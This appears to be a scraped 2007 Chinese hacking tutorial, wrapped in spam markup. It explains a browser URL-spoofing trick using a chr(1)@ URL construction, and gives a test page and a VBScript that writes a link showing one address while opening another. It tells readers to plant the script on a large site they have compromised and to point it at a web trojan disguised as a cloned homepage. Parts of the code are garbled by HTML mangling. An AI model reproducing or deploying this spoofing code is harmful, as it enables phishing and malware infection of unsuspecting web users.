• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 黑客新技術 域名欺騙技術實現過程

    發表于:2007-07-02來源:作者:點擊數: 標簽:
    網頁木馬種植方案一直都存在很大的問題,當然欺騙需要技巧也需要時間,我們現在不需要那么麻煩的欺騙,本文就是教大家利用最新瀏覽器漏洞實現域名的欺騙..... 前言 域名欺騙有多種實現方法,本文所說的是利用客戶端瀏覽器的漏洞來欺騙用戶。 多數瀏覽器都會
        網頁木馬種植方案一直都存在很大的問題,當然欺騙需要技巧也需要時間,我們現在不需要那么麻煩的欺騙,本文就是教大家利用最新瀏覽器漏洞實現域名的欺騙.....

      前言

      域名欺騙有多種實現方法,本文所說的是利用客戶端瀏覽器的漏洞來欺騙用戶。

      多數瀏覽器都會存在這個漏洞,目前暫時還沒相應的補丁。漏洞是這樣的:
    當用戶通過瀏覽器訪問一個url,如果這個url是經過以下的格式構造的,那么瀏覽器實際將訪問經過構造的惡意頁面,而用戶瀏覽器的地址欄里所顯示的將是虛假的url:

      url的構造格式為:

    _1][special_char]@[url_2]/" target=_blank>http://[url_1][special_char]@[url_2]

      說明:

      url_1為用戶所看到的地址,地址中不可以帶"/"
      special_char為一個特殊的字符,即ascii碼為1的字符
      url_2為惡意頁面地址

      利用過程

      首先請看這個測試頁面:

    <html>
    <head>
    <title>域名欺騙技術實例</title>
    </head>
    <body link="#0000ff" alink="#0000ff" vlink="#0000ff">
    你可以看看這兩個鏈接有什么區別:<br>
    <h1>鏈接1:<script language="vbscript" src="deceive.vbs"></script></h1>
    <h1>鏈接2:<a href="_blank ?>www.163.com" target="_blank">http://www.163.com/"; target="_blank" http://ww ... ";>www.163.com</a></h1>
    </body>
    </html>

      這個網頁源代碼,其中鏈接1指向了一個vbs腳本,而鏈接2指向的是163站點。如果我們把連接一的vbs腳本改成下列代碼:

    @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#deceive.vbs@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#
    @#(以下請根據實際情況自行修改:)
    url1="http://www.163.com/"
    url2="http://www.google.com/"
    text="http://www.163.com/"
    url="_blank ?>http://";&url1&chr(1)& ... p;url2&""
    dn="/"
    mouseover="onmouseover=""javascript :window.status=@#_blank ?>http://";&url1&dn&"@#"""
    mouseout="onmouseout=""javascript :window.status=@#@#"""
    click="onclick=""javascript :navigate(@#"&url&"@#)"""
    style="style=""cursor:hand"""
    tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&"><font color=""#0000ff""><u>"&text&"</u></font></span>"
    document.write tag
    @#說明:
    @#url1是用來欺騙用戶的地址.
    @#url2是實際訪問的地址,可以是網頁木馬、惡意網頁等.
    @#text是鏈接的文字.
    @#注意:(以上欺騙地址及實際地址不可以加"http://")
    @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#cuts here@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#

      現在大家看到了吧~~當我們點擊這個測試頁面的時候,鏈接1指向的是google.com,而且狀態欄和地址欄里都顯示"_blank>http://www.163.com/",鏈接2卻指向163.com。你也許感到不可思議,但這就是域名欺騙漏洞的魅力。

      我們可以想象,如果以上的測試頁面中的鏈接1指向的不是google.com,而是我們的網頁木馬,那就......

      不過,一個普通的個人網站沒人會看的,這就需要我們把這種假鏈接添加到別的大網站的頁面之中。假設我們入侵了一個比較大的網站,比如網易(哇~~~~~~這時候一只菜鳥推著一車磚頭,看著我......)。這時候就可以把它的頁面給改了。

      比如有一個文字鏈接,我們就可以把代碼中的"<a href="xxxxx.htm">xxxxxx</a>"改為我們自己的代碼:"<script language="vbscript" src="deceive.vbs"></script>"??吹絪rc屬性里的deceive.vbs了嗎 ?我們要編輯好這個文件,然后上傳到要修改的頁面目錄下。

      這樣還不行,我們還要把自己的木馬網頁的界面修改一下。也就是把原來鏈接到的頁面加入到我們自己的木馬網頁,并且我們的木馬網頁里的所有鏈接等內容要和原來的頁面一樣,否則就會引起用戶的懷疑?,F在,我們把google網站的首頁源代碼全部復制下來,添加到我們的網頁木馬。把復制下來的代碼中的圖片或者是鏈接的文件都修改完整,比如logo.gif改為_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否則網頁就和原來的不一樣了(圖片顯示為紅色的×,鏈接也失效),因為用戶打開的是你的站點,而你的站點中并沒有logo.gif。都修改好后就可以保存文件了。上傳到你的網頁空間里。

      至此,我們的工作已經完成。喝一杯咖啡,休息一會......

      當我們進入這個網站后,點擊我們修改過的連接,你會發現和原來的頁面幾乎就一模一樣(當然,也有些細微的區別,不過一般很難覺察)。就當人家在瀏覽這個網頁的時候,他已經在不知不覺中中了木馬,而你也開心地笑呢!~呵呵

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>